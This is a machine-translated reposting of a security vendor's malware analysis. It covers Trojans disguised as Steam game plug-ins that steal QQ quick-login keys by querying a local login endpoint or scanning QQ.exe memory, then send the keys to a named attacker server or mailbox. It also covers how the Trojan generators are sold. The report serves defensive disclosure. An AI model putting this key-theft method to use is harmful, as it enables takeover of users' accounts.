Shulou(Shulou.com)06/01 Report--

What is the analysis report of Steam's new stolen Trojan horse and industry chain? in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

The author of the report: preface to 0x00, Core Security Division of 360CERTRE360.

PUBG: PLAYERUNKNOWN'S BATTLEGROUNDS has been at the top of the sales list since the launch of Steam, which shows the popularity of the game. Users have joined the "chicken eating army", while "PUBG: PLAYERUNKNOWN'S BATTLEGROUNDS" requires users to spend 98 yuan at Steam Mall to start eating chicken. Underground industry practitioners also found this "business opportunity" and targeted the Steam account in the hands of users, trying to make a profit by stealing Steam account data and selling it.

Post "mailbox data".

And we also found that these underground industry practitioners are trying to sell illegal Steam data in post bars and QQ groups, and a large number of illegal Steam data transactions are published in the "mailbox data" post bar. And, our cloud security system monitoring recently also exposed some illegal elements with the help of mufflers, plug-ins, accelerators, etc., to spread the stolen Trojan horse, once the Trojan horse runs, it can successfully steal the user's QQ number and dynamic Skey.

For the convenience of users, Tencent can use the method of "quick login" in the QQ computer that logs in. In the process of using this login method, a key will be generated, which is another ID card for QQ login. People with stolen numbers can use this key to identify the user's QQ, log in to email, Qzone, see photo albums, diaries, post and talk, Weibo, Tenpay, QB query.

Use the QQkey login mailbox tool

The lawbreakers who spread through the camouflage steam plug-in quickly log on to QQ Mail and will steal the Steam account and related property bound with QQ Mail.

360-CERT analyzed this vulnerability and found that the impact of the vulnerability is serious. At present, relevant reports have been made public, and relevant users are advised to evaluate the plan as soon as possible.

Analysis of 0x01 Industry chain

We try to communicate with one of the "traffickers" in the post bar, trying to restore the entire theft number industry chain.

In the process of communication, "vendors" show us the tools and test data needed in the process of stealing Steam accounts. from the tools, we find that the main ways they use to steal QQKey are Tencent enterprise email and ASP.

Stolen number Trojan generator, QQKEY logger

The "dealer" also told us the price of these tools and source code in the circle. the easy language source code of the whole set of stolen number Trojan generator sells for 1500, while for some people who do not understand the processing of easy language source code, it is mainly through the purchase price of the QQKey stolen number Trojan generator around 800. even the login used to log into QQKey also needs 400.

We need to test whether the theft Trojan can avoid killing 360. the dealer said its Trojan could pass 360. however, the file was checked and killed by QVM as soon as the file was downloaded. In fact, the technical threshold of the Trojan is not high. The most important thing in the whole process of theft is the amount of account data, and in the process of follow-up communication, we also learned that their methods were mainly drainage and dissemination, and once again showed us the "treasure book" of their industry.

Finally, we restore the situation of this kind of black industry chain as shown in the following figure:

0x02 steals QQkey

According to the samples captured recently, we found that there are two main attack methods for this kind of stolen Trojans to steal QQkey.

Using QQ to quickly log in and steal QQKey

Get the key of the user logging in to the qq by visiting http://localhost.ptlogin2.qq.com:4300/[url], and send the clientKey in the Set-Cookie to the herder's server (464690486.blkj.tk).

The server of the horse herder receives the QQkey process storage through qqkey.php in the way of Get. The main data transmitted are: qq number, QQ name, QQkey.

Send the key of the qq number and qq login to the specified server

Also send the information to the specified mailbox

The traffic of the receiving website of a Trojan distributor:

Note: the picture is from 360 Network Security Research Institute.

According to the website traffic, the website traffic suddenly soared from March 30, 2018, and we also posted the visit log of the site.

The mailbox of another Trojan distributor:

From this we can see that we have gained a lot.

Brute force search memory extraction QQkey, upload server or mailbox

Read QQ.exe memory

Send QQKey to the server

Log in to the server of a person who stole your account, and you can see that more than 2000 QQ accounts and passwords have been stolen in about half an hour.

QQKey records on the server

New variety

With regard to this new variant, we find that his method of obtaining QQkey has not changed (at present, only 360 can be checked and killed in China)

The QQkey is still obtained through the fast login API of QQ, as shown below:

However, we found that his method of uploading QQkey has changed, from receiving mail through email and ASP to socket communication. As shown below, the Trojan is connecting to the ClearC server:

We have obtained the Trojan generator of this variety through technical means, which includes: fully automatic access to QQ Mail theft number, management access to the QQkey, automatic generation of Trojans, etc., it can be seen that the functions are very complete.

Among them, we learned that the traffic of the server soared between April 11 and April 12, so the variant should have been released on April 11. After that, we blocked this variant. The traffic diagram of the CumberC server is as follows:

Note: the picture is from 360 Network Security Research Institute.

0x03 IOC

12e13e.exe 55AC18FB660F726EB801B8F03F9EBC37

Wrqdfq.exe 37575D21B8CD16ABA4C3E1B3013B1E31

QQPass.exe 6CB90F793DB09FEF0077E599C6FF6F20

Suggestions on 0x04 timeline prevention

1. Download and install "360 Security Guard" immediately to guard against such Trojans.

2. Do not turn off the protective function of the security software because of the use of auxiliary software.

0x05 summary

Big data shows that the number of Trojans has been increasing, which may not only affect the security of users' Steam accounts, but also affect the security of other QQ businesses, and may cause users to suffer greater economic losses.

It is recommended that the majority of users immediately download and install the only "360 security guard" who can kill such samples in China.

.

This is the answer to the analysis report on Steam's new stolen Trojan horse and industry chain. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.